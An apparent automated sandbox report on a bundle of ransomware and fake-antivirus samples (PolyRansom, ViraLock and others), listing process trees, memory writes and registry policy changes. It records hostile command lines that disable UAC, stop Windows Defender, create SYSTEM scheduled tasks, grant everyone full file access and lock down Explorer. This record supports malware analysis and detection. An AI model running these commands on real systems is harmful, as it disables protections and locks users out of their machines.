PID 4788 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\System32\Conhost.exe
PID 4788 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\System32\Conhost.exe
PID 4788 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\System32\Conhost.exe
PID 4788 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4688 -ip 4688

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 584

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\MooskccM\OgMMAEUs.exe

"C:\Users\Admin\MooskccM\OgMMAEUs.exe"

C:\ProgramData\vyQwMwog\xsskQcks.exe

"C:\ProgramData\vyQwMwog\xsskQcks.exe"

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Delete /F /TN rhaegal

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qkQQkAAs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4168 -ip 4168

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 480

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1961501349 && exit"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp

"C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp" /SL4 $10398 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Users\Admin\AppData\Local\Temp\Fantom.exe

"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:57:00

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\winsp2up.exe

"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Users\Admin\AppData\Roaming\bovdgt.exe

C:\Users\Admin\AppData\Roaming\bovdgt.exe

C:\Windows\SysWOW64\sc.exe

sc config WinDefend start= disabled

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 448

C:\Windows\SysWOW64\sc.exe

sc stop WinDefend

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ewIMoUcM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Program Files (x86)\Security Central\Security Central.exe

"C:\Program Files (x86)\Security Central\Security Central.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kmEAQMgw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Program Files (x86)\VAV\vav.exe

"C:\Program Files (x86)\VAV\vav.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Windows\SysWOW64\sc.exe

sc config WinDefend start= disabled

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\ProgramData\4749af15-06d5-4275-a22d-e0727245fc3f_31.avi", start

C:\Windows\SysWOW64\sc.exe

sc stop WinDefend

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /F /TN rhaegal

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5464 -ip 5464

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Windows\9191.tmp

"C:\Windows\9191.tmp" \\.\pipe\{E17B18FF-AF97-4E7A-AE1A-A093BD92BC40}

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3428 -ip 3428

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Program Files (x86)\Security Central\Security Central.exe

"C:\Program Files (x86)\Security Central\Security Central.exe"

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AA98.tmp\302746537.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1961501349 && exit"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 572

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97761664462357.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:57:00

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\[email protected] SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "

